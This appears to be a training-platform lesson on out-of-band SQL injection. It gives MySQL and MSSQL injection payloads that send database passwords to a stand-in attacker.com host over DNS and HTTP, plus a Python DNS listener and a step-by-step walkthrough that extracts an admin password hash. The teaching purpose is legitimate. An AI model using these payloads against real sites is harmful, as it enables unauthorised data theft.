Vulnarex | Elite Cybersecurity Learning Platform

#Exfiltrating Data Through Alternative Channels#link

Out-of-band (OOB) SQL injection extracts data through channels other than the application's HTTP response. This technique is useful when in-band extraction is impossible or too slow, using DNS requests or HTTP callbacks to exfiltrate data.

Having mastered blind injection techniques, we now explore an alternative approach that bypasses the limitations of in-band extraction entirely by using separate communication channels.

Understanding Out-of-Band Techniques

OOB techniques use database functions that can make network requests to external servers. By embedding extracted data in these requests, we can receive the data on our own server without relying on the application's response.

DNS Exfiltration

DNS exfiltration embeds data in DNS queries to a domain you control. The database resolves a hostname containing your extracted data, and your DNS server logs the request.

bash

# MySQL DNS exfiltration
http://target.com/product.php?id=1 AND (SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users LIMIT 1),'.attacker.com\\a')))--

# Alternative using INTO OUTFILE with DNS
http://target.com/product.php?id=1 UNION SELECT 1,(SELECT password FROM users LIMIT 1),3 INTO OUTFILE '\\\\attacker.com\\share\\data.txt'--

HTTP Exfiltration

Some databases support making HTTP requests directly, allowing data exfiltration through web requests to your server.

bash

# MSSQL using sp_OACreate for HTTP requests
http://target.com/product.php?id=1; DECLARE @url VARCHAR(255); SET @url = 'http://attacker.com/(opens in new tab)?' + (SELECT password FROM users); EXEC sp_OACreate 'MSXML2.XMLHTTP', @url OUT; EXEC sp_OAMethod @url, 'open', NULL, 'GET', @url, false; EXEC sp_OAMethod @url, 'send'--

Setting Up the Listener

To receive exfiltrated data, you need to set up a server that can capture DNS queries or HTTP requests containing the data.

Setting Up DNS Listener

root@vulnarex:~## Start a simple DNS server to capture queries sudo tcpdump -i eth0 -n port 53 # Or use a dedicated tool like dnslistener python3 -c " import socket sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind(('0.0.0.0', 53)) while True: data, addr = sock.recvfrom(1024) print(f'DNS query from {addr}: {data}') "

info

💡 Services like interactsh.com or burp collaborator provide ready-made OOB servers for receiving exfiltrated data without setting up your own infrastructure.

Database-Specific OOB Methods

Database	Method	Function
MySQL	DNS	LOAD_FILE() with UNC path
MySQL	HTTP	User-defined function (UDF)
PostgreSQL	HTTP	dblink or PL/Python
MSSQL	HTTP	sp_OACreate/sp_OAMethod
MSSQL	DNS	xp_dirtree with UNC path
Oracle	HTTP	UTL_HTTP package
Oracle	DNS	UTL_INADDR

STRICT SECURE AUDIT RULE

⚠️ OOB techniques require the database to have network access to external servers. Many production databases are isolated from the internet, limiting this technique's applicability.

Practical Example

bash

# Complete DNS exfiltration attack
# Step 1: Set up DNS server on attacker.com
# Step 2: Inject payload to exfiltrate admin password

http://target.com/product.php?id=1 AND (SELECT LOAD_FILE(CONCAT('\\',(SELECT password FROM users WHERE username='admin'),'.attacker.com\test')))--

# Step 3: Monitor DNS logs for the exfiltrated data
# DNS query received: 5f4dcc3b5aa765d61d8327deb882cf99.attacker.com
# Extracted MD5 hash: 5f4dcc3b5aa765d61d8327deb882cf99

quiz BLOCK (★ 50 XP)

What is the primary advantage of out-of-band SQL injection over blind techniques?

Select your proof vectors above

Out-of-Band SQL Injection

#Exfiltrating Data Through Alternative Channels#link

Understanding Out-of-Band Techniques

DNS Exfiltration

HTTP Exfiltration

Setting Up the Listener

Database-Specific OOB Methods

Practical Example

What is the primary advantage of out-of-band SQL injection over blind techniques?

Verification Proof Checkpoint